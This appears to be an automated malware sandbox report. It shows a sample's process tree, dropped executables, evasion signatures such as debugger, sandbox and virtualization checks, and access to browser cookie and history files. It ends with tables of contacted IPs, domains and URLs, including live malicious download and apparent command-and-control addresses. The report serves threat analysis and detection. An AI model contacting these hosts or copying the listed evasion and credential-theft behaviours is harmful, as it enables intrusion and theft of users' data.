C:\ProgramData\Microsoft\...\Report.wer, Unicode 25->79 dropped 185 Detected unpacking (overwrites its own PE header) 28->185 187 Machine Learning detection for dropped file 28->187 52 cmd.exe 28->52         started        189 Detected unpacking (changes PE section rights) 31->189 54 WerFault.exe 31->54         started        113 services.addons.mozilla.org 18.65.39.112 MIT-GATEWAYSUS United States 33->113 115 142.250.181.238 GOOGLEUS United States 33->115 121 18 other IPs or domains 33->121 81 C:\Users\user\AppData\...\places.sqlite-wal, SQLite 33->81 dropped 83 C:\Users\user\AppData\...\places.sqlite, SQLite 33->83 dropped 85 C:\Users\user\AppData\...\cookies.sqlite-wal, SQLite 33->85 dropped 87 C:\Users\user\AppData\...\cookies.sqlite, SQLite 33->87 dropped 56 firefox.exe 33->56         started        58 firefox.exe 33->58         started        117 www.youtube.com 36->117 119 clients2.googleusercontent.com 36->119 123 17 other IPs or domains 36->123 89 C:\Users\user\AppData\Local\...\Cookies, SQLite 36->89 dropped file10 signatures11 process12 file13 91 C:\Users\user\AppData\Local\...\axplong.exe, PE32 42->91 dropped 155 Detected unpacking (changes PE section rights) 42->155 157 Tries to evade debugger and weak emulator (self modifying code) 42->157 159 Tries to detect virtualization through RDTSC time measurements 42->159 60 axplong.exe 42->60         started        93 C:\Users\user\AppData\Local\...\explorti.exe, PE32 48->93 dropped 161 Hides threads from debuggers 48->161 163 Tries to detect sandboxes / dynamic malware analysis system (registry check) 48->163 165 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 48->165 63 explorti.exe 48->63         started        65 chrome.exe 52->65         started        68 msedge.exe 52->68         started        70 conhost.exe 52->70         started        72 firefox.exe 52->72         started        signatures14 process15 dnsIp16 191 Detected unpacking (changes PE section rights) 60->191 193 Tries to detect sandboxes and other dynamic analysis tools (window names) 60->193 195 Tries to evade debugger and weak emulator (self modifying code) 60->195 197 Hides threads from debuggers 63->197 199 Tries to detect sandboxes / dynamic malware analysis system (registry check) 63->199 201 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 63->201 125 192.168.2.5, 443, 49703, 49704 unknown unknown 65->125 127 239.255.255.250 unknown Reserved 65->127 74 chrome.exe 65->74         started        77 msedge.exe 68->77         started        signatures17 process18 dnsIp19 141 www.youtube.com 74->141 143 accounts.youtube.com 74->143 145 4 other IPs or domains 74->145
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
143.204.9.50
 mitmdetection.services.mozilla.com United States
16509 AMAZON-02US false
13.107.246.40
 unknown United States
8068 MICROSOFT-CORP-MSN-AS-BLOCKUS false
142.250.80.110
 unknown United States
15169 GOOGLEUS false
34.120.237.76
 img-prod.pocket.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
85.28.47.31
 unknown Russian Federation
31643 GES-ASRU true
142.251.40.206
 unknown United States
15169 GOOGLEUS false
162.159.61.3
 chrome.cloudflare-dns.com United States
13335 CLOUDFLARENETUS false
142.250.185.142
 play.google.com United States
15169 GOOGLEUS false
34.120.208.123
 telemetry-incoming.r53-2.services.mozilla.com United States
15169 GOOGLEUS false
172.217.16.142
 unknown United States
15169 GOOGLEUS false
34.117.121.53
 attachments.prod.remote-settings.prod.webservices.mozgcp.net United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
34.120.5.221
 prod.pocket.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
172.217.18.4
 www.google.com United States
15169 GOOGLEUS false
185.215.113.19
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
172.253.62.84
 unknown United States
15169 GOOGLEUS false
239.255.255.250
 unknown Reserved
unknown unknown false
34.160.144.191
 prod.content-signature-chains.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false
23.96.180.189
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
172.217.18.14
 youtube-ui.l.google.com United States
15169 GOOGLEUS false
152.195.19.97
 unknown United States
15133 EDGECASTUS false
34.149.97.1
 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net United States
2686 ATGS-MMD-ASUS false
172.217.23.110
 unknown United States
15169 GOOGLEUS false
142.250.181.238
 unknown United States
15169 GOOGLEUS false
34.117.188.166
 contile.services.mozilla.com United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
142.251.32.100
 unknown United States
15169 GOOGLEUS false
142.250.185.161
 googlehosted.l.googleusercontent.com United States
15169 GOOGLEUS false
142.250.65.195
 unknown United States
15169 GOOGLEUS false
172.217.16.206
 unknown United States
15169 GOOGLEUS false
94.245.104.56
 ssl.bingadsedgeextension-prod-europe.azurewebsites.net United Kingdom
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
142.251.40.238
 unknown United States
15169 GOOGLEUS false
34.149.100.209
 prod.remote-settings.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false
34.107.221.82
 prod.detectportal.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
35.244.181.201
 prod.balrog.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
18.65.39.112
 services.addons.mozilla.org United States
3 MIT-GATEWAYSUS false
142.251.40.163
 unknown United States
15169 GOOGLEUS false
142.250.186.164
 unknown United States
15169 GOOGLEUS false
34.36.165.17
 tiles-cdn.prod.ads.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false
35.190.72.216
 prod.classify-client.prod.webservices.mozgcp.net United States
15169 GOOGLEUS false

Private

IP
192.168.2.5
127.0.0.1

Contacted Domains

Name IP Active
example.org 93.184.215.14 true
chrome.cloudflare-dns.com 162.159.61.3 true
market-trk.com 104.18.12.104 true
prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 true
services.addons.mozilla.org 18.65.39.112 true
prod.pocket.prod.cloudops.mozgcp.net 34.120.5.221 true
tiles-cdn.prod.ads.prod.webservices.mozgcp.net 34.36.165.17 true
ww55.affinity.net 34.160.134.7 true
www.romper.com 143.204.98.82 true
firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net 34.149.97.1 true
mitmdetection.services.mozilla.com 143.204.9.50 true
contile.services.mozilla.com 34.117.188.166 true
prod.content-signature-chains.prod.webservices.mozgcp.net 34.160.144.191 true
www.jezebel.com 172.67.13.9 true
us-west1.prod.sumo.prod.webservices.mozgcp.net 34.149.128.2 true
ipv4only.arpa 192.0.0.170 true
www.mozorg.moz.works 18.239.17.158 true
eat.hungryroot.com 159.89.133.227 true
prod.ads.prod.webservices.mozgcp.net 34.117.188.166 true
www.google.com 172.217.18.4 true
www.themarshallproject.org 104.22.69.164 true
star-mini.c10r.facebook.com 157.240.252.35 true
prod.classify-client.prod.webservices.mozgcp.net 35.190.72.216 true
prod.balrog.prod.cloudops.mozgcp.net 35.244.181.201 true
img-prod.pocket.prod.cloudops.mozgcp.net 34.120.237.76 true
twitter.com 104.244.42.1 true
getpocket.com 143.204.98.129 true
www.wired.com 108.156.60.57 true
ssl.bingadsedgeextension-prod-europe.azurewebsites.net 94.245.104.56 true
dyna.wikimedia.org 185.15.59.224 true
prod.remote-settings.prod.webservices.mozgcp.net 34.149.100.209 true
pki-goog.l.google.com 142.250.185.227 true
youtube-ui.l.google.com 172.217.18.14 true
attachments.prod.remote-settings.prod.webservices.mozgcp.net 34.117.121.53 true
www3.l.google.com 142.250.185.238 true
play.google.com 142.250.185.142 true
reddit.map.fastly.net 151.101.65.140 true
d3ag4hukkh62yn.cloudfront.net 99.86.2.175 true
googlehosted.l.googleusercontent.com 142.250.185.161 true
telemetry-incoming.r53-2.services.mozilla.com 34.120.208.123 true
spocs.getpocket.com unknown unknown
clients2.googleusercontent.com unknown unknown
firefox.settings.services.mozilla.com unknown unknown
www.youtube.com unknown unknown
r3.o.lencr.org unknown unknown
detectportal.firefox.com unknown unknown
bzib.nelreports.net unknown unknown
www.expedia.com unknown unknown
o.pki.goog unknown unknown
shavar.services.mozilla.com unknown unknown
www.reddit.com unknown unknown
content-signature-2.cdn.mozilla.net unknown unknown
support.mozilla.org unknown unknown
push.services.mozilla.com unknown unknown
www.facebook.com unknown unknown
r11.o.lencr.org unknown unknown
img-getpocket.cdn.mozilla.net unknown unknown
r10.o.lencr.org unknown unknown
firefox-api-proxy.cdn.mozilla.net unknown unknown
www.amazon.com unknown unknown
accounts.youtube.com unknown unknown
www.wikipedia.org unknown unknown
getpocket.cdn.mozilla.net unknown unknown
firefox-settings-attachments.cdn.mozilla.net unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://85.28.47.31/8405906461a5200c/vcruntime140.dll true
  • Avira URL Cloud: malware
 unknown
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/ddb01327-71d3-427b-8f25-2666ca1019bf false
  • Avira URL Cloud: safe
 unknown
https://firefox.settings.services.mozilla.com/v1/ false
  • Avira URL Cloud: safe
 unknown
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/3012260d-8f8d-4863-9be6-03970e37af68 false
  • Avira URL Cloud: safe
 unknown
https://spocs.getpocket.com/spocs false
  • URL Reputation: safe
 unknown
http://185.215.113.19/Vi9leo/index.php true
  • Avira URL Cloud: phishing
 unknown
http://85.28.47.31/8405906461a5200c/softokn3.dll true
  • Avira URL Cloud: malware
 unknown
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/d6977194-0ec3-4aef-b861-5cb96278213d false
  • Avira URL Cloud: safe
 unknown
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/bfaa2e89-f7e3-478e-b83d-3bf27fc2c00f false
  • Avira URL Cloud: safe
 unknown
http://85.28.47.31/8405906461a5200c/nss3.dll true
  • Avira URL Cloud: malware
 unknown
https://www.google.com/favicon.ico false
  • Avira URL Cloud: safe
 unknown
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/d4e275ab-c7a1-4d16-9407-d03d849b8e21 false
  • Avira URL Cloud: safe
 unknown
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/d7f071e9-d3de-4df6-9079-ca2e3ecddc08 false
  • Avira URL Cloud: safe
 unknown
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/91ef2bf1-a36b-48dd-914e-195981ce7ea7 false
  • Avira URL Cloud: safe
 unknown
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/d03657b0-717f-46ce-ac76-f69d851cb204 false
  • Avira URL Cloud: safe
 unknown
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/021a8f00-3de7-4da0-a723-1e308f3de9f9 false
  • Avira URL Cloud: safe
 unknown
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/dff96728-c23d-4f24-91c7-9233d01352d4 false
  • Avira URL Cloud: safe
 unknown
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/7cc0fd66-fa48-46f1-9a0e-537764d9a4da false
  • Avira URL Cloud: safe
 unknown
https://img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fmedia.wired.com%2Fphotos%2F669ee1db82dcc6be43bb872a%2F191%3A100%2Fw_1280%2Cc_limit%2FAMOC_Laerke_011.jpg false
  • Avira URL Cloud: safe
 unknown
https://contile.services.mozilla.com/v1/tiles false
  • URL Reputation: safe
 unknown
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/f11c1bba-0d2e-44d8-acb1-e375719dd8b8 false
  • Avira URL Cloud: safe
 unknown
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/c8ad0165-121f-4bc8-bdd1-a2822cb41726 false
  • Avira URL Cloud: safe
 unknown
https://tiles-cdn.prod.ads.prod.webservices.mozgcp.net/m6BvG6Rcntmafem2bLfA5IktKm1SEwqO2E4XIjaC12c=.10862.jpg false
  • Avira URL Cloud: safe
 unknown
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/quicksuggest/41a4b1d8-9773-4011-ab45-8d749a67cebd false
  • Avira URL Cloud: safe
 unknown